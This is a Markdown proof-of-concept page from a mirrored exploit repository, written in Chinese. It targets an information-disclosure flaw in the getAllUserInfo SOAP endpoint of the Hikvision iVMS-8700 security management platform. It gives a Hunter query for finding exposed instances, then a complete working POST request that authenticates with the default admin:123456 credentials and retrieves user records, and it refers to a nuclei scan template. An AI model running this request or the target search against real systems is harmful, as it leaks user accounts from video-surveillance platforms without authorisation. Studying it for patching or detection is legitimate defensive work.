admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 19:35:52 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/海康威视/海康威视iVMS综合安防系统/海康威视iVMS-8700综合安防管理平台getAllUserInfo存在信息泄露漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

2.4 KiB
Raw Blame History

海康威视iVMS-8700综合安防管理平台 getAllUserInfo存在信息泄露漏洞

一、漏洞简介

海康威视iVMS集中监控应用管理平台是以安全防范业务应用为导向以视频图像应用为基础手段综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统构建的多业务应用综合管理平台。海康威视iVMS-8700综合安防管理平台 getAllUserInfo存在信息泄露漏洞

二、影响版本

  • 海康威视综合安防系统iVMS-5000
  • 海康威视综合安防系统 iVMS-8700

三、资产测绘

  • hunterweb.body="/views/home/file/installPackage.rar"

1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0.png

  • 登录页面:

1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111.png

四、漏洞复现

POST /services/IWsBaseService.IWsBaseServiceHttpSoap11Endpoint HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Content-Length: 569
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Authorization: Basic YWRtaW46MTIzNDU2
Connection: close
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:impl="http://impl.ws.api.base.cms.hikvision.com" xmlns:xsd="http://ws.common.cms.hikvision.com/xsd">
<soapenv:Header/>
<soapenv:Body>
    <impl:getAllUserInfo>
        <impl:request>
            <!--type: int-->
            <xsd:pageNo>1</xsd:pageNo>
            <!--type: int-->
            <xsd:pageSize>1</xsd:pageSize>
        </impl:request>
        <!--type: long-->
        <impl:updTime></impl:updTime>
    </impl:getAllUserInfo>
</soapenv:Body>
</soapenv:Envelope>

1702650308771-920c2278-18dd-4f17-bc87-8b5a182f4e16.png

nuclei脚本

海康威视-ivms-8700-信息泄露.yaml

更新: 2024-02-29 23:57:17
原文: https://www.yuque.com/xiaokp7/ocvun2/vlzpa0f6workvx4g